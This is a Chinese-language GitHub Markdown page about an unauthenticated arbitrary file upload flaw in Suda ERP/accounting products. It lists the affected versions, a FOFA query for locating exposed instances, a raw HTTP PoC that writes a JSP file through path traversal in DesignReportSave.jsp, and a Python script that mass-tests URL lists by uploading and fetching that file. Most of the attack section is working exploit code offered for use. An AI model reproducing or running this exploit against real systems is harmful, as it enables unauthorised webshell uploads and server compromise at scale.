Skip to content

Latest commit

 

History

History
78 lines (66 loc) · 3.03 KB

速达软件全系产品存在任意文件上传漏洞.md

File metadata and controls

78 lines (66 loc) · 3.03 KB
Raw

速达软件全系产品存在任意文件上传漏洞

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.

影响版本

速达A3.cloud BAS、速达A3.cloud STD、速达A30.cloud PRO、速达3000.online PRO、速达A4.cloud BAS、速达A4.cloud STD
速达A40.cloud PRO、速达4000.online PRO、速达A5.cloud STD、速达A50.cloud PRO、速达A70.cloud PRO
速达5000.online PRO、速达7000.online PRO

fofa

app="速达软件-公司产品"

poc

POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28

<% out.print("984969719");%>

批量脚本

import requests
import argparse
poc = "/report/DesignReportSave.jsp?report=../625248.jsp"
headers = {
        "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36",
        "Content-Type": "application/octet-stream"
    }
data = '''<% out.print("This is a page !");%>'''
def chack(url):
    try:
        url = "http://"+url
        reps = requests.post(url=url+poc,headers=headers,data=data,verify=False,timeout=5)
        shell_path = url+"/625248.jsp"
        repps = requests.get(url=shell_path,headers=headers,verify=False,timeout=3)
        if repps.status_code == 200:
            print(f"[+] 存在速达软件存在任意文件上传 url : {shell_path}")
        else:
            print(f"未发现速达软件存在任意文件上传 url : {url}")
    except Exception as e:
        print(f"ERROR : {e}")

def main():
    parser = argparse.ArgumentParser(description='速达软件全系产品存在任意文件上传')
    parser.add_argument('-u', '--url', type=str, help='URL to process')
    parser.add_argument('-f', '--file', type=str, help='File path to process')

    args = parser.parse_args()
    if args.url:
        chack(args.url)

    elif args.file:
        with open(args.file, 'r') as file:
            lines = file.readlines()
            for line in lines:
                chack(line.strip())

    else:
        print("eg : python3 速达软件全系产品存在任意文件上传.py -u http://xx.xx.x.x")
        print("eg : python3 速达软件全系产品存在任意文件上传.py -f 123.txt")

if __name__ == '__main__':
    main()